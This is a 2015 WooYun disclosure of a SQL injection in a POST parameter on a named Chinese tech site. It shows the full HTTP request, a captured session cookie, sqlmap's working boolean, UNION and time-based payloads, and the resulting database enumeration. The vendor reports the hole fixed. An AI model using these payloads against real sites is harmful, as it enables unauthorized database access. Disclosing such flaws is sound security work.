当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090723

漏洞标题:硅谷动力主站SQL注入

相关厂商:www.enet.com.cn

漏洞作者: Night

提交时间:2015-01-09 12:18

修复时间:2015-02-23 12:20

公开时间:2015-02-23 12:20

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-09: 细节已通知厂商并且等待厂商处理中
2015-01-12: 厂商已经确认,细节仅向厂商公开
2015-01-22: 细节向核心白帽子及相关领域专家公开
2015-02-01: 细节向普通白帽子公开
2015-02-11: 细节向实习白帽子公开
2015-02-23: 细节向公众公开

简要描述:

主站sql注入

详细说明:

post注入

POST /itself/asklist.jsp HTTP/1.0
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.enet.com.cn/itself/
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
Host: www.enet.com.cn
Content-Length: 9
Pragma: no-cache
Cookie: ad_play_index=62; JSESSIONID=abcdocvhVIaTb617umkRu; __utma=260886866.919018567.1420731418.1420731418.1420731418.1; __utmb=260886866.2.10.1420731418; __utmc=260886866; __utmz=260886866.1420731418.1.1.utmcsr=baidu|utmccn=(organic)|utmcmd=organic|utmctr=%E7%A1%85%E8%B0%B7%E5%8A%A8%E5%8A%9B; __utmt=1
qkey=a

漏洞证明:

Place: POST
Parameter: qkey
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: qkey=-7673' OR (9824=9824)#
Type: UNION query
Title: MySQL UNION query (random number) - 11 columns
Payload: qkey=-8049' UNION ALL SELECT 7849,7849,7849,7849,7849,7849,CONCAT(0
x7167647471,0x6e497974747868795265,0x717a796a71),7849,7849,7849,7849#
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 OR time-based blind (heavy query)
Payload: qkey=-7637' OR 2170=BENCHMARK(5000000,MD5(0x784e5770)) AND 'ReXo'='
ReXo
---
do you want to exploit this SQL injection? [Y/n]
[23:43:11] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 4
[23:43:11] [WARNING] information_schema not available, back-end DBMS is MySQL <
5. database names will be fetched from 'mysql' database
[23:43:11] [INFO] the SQL query used returns 2 entries
available databases [2]:
[*] test
[*] test\\_%

修复方案:

多半你们会忽悠吧 广告位:北城以北 只见狐狸不见卿

版权声明:转载请注明来源 Night@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-01-12 10:54

厂商回复:

已修复

最新状态:

暂无